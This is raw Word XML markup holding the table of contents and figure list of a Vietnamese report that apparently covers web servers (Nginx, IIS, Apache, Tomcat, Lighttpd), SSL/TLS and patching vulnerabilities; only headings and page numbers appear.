              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085522 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="208C54A9" w14:textId="3A72224F" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085530" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thông tin chi tiết</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085530 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4298A731" w14:textId="7EE57417" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085531" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tiến hành thực nghiệm</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085531 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7552EDCC" w14:textId="411A837D" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085532" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cách vá các lỗ hổng</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085532 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="097993A3" w14:textId="129D947E" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085533" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TỔNG KẾT</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085533 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="182196AE" w14:textId="350E49F6" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085534" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TÀI LIỆU THAM KHẢO</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085534 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79EB7609" w14:textId="003836AA" w:rsidR="0039084A" w:rsidRDefault="0039084A">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="732223B4" w14:textId="5195DE6B" w:rsidR="004F1393" w:rsidRDefault="004F1393" w:rsidP="004F1393"/>
    <w:p w14:paraId="6F718806" w14:textId="14B6D395" w:rsidR="004F1393" w:rsidRPr="004F1393" w:rsidRDefault="004F1393" w:rsidP="004F1393">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C7C17F" w14:textId="17A1C2B2" w:rsidR="00D96892" w:rsidRDefault="000E5B69" w:rsidP="00F66124">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc171085471"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC</w:t>
      </w:r>
      <w:r w:rsidR="00D96892">
        <w:t xml:space="preserve"> ẢNH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MINH HỌA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2B7F1D51" w14:textId="163DF76B" w:rsidR="00C264FC" w:rsidRDefault="00C264FC">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình 1." </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc170814805" w:history="1">
        <w:r w:rsidRPr="00EE64A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1. 2: Cách thức hoạt động của Web Server</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814805 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="469479D4" w14:textId="4351C6B0" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814806" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00EE64A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1. 3: Nginx</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814806 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="491285D8" w14:textId="3C49113D" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814807" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00EE64A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1. 4: Microsoft IIS</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814807 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66A5826A" w14:textId="288774C1" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814808" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00EE64A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1. 5: Apache</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814808 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7688F944" w14:textId="0B5DAA08" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814809" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00EE64A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1. 6: Tomcat</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814809 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FCFA0F5" w14:textId="69C2B8FA" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814810" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00EE64A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1. 7: Lighttpd</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814810 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6736AAE6" w14:textId="77777777" w:rsidR="00C264FC" w:rsidRDefault="00C264FC" w:rsidP="00C264FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình 2." </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="374719FD" w14:textId="2B30810F" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814816" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00BB55E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2. 1: Câu lệnh thay đổi quyền</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170814816 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000F27E2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DBCCFFC" w14:textId="24E42353" w:rsidR="00C264FC" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170814817" w:history="1">
        <w:r w:rsidR="00C264FC" w:rsidRPr="00BB55E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2. 2: Quy trình bắt tay SSL (TLS)</w:t>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C264FC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
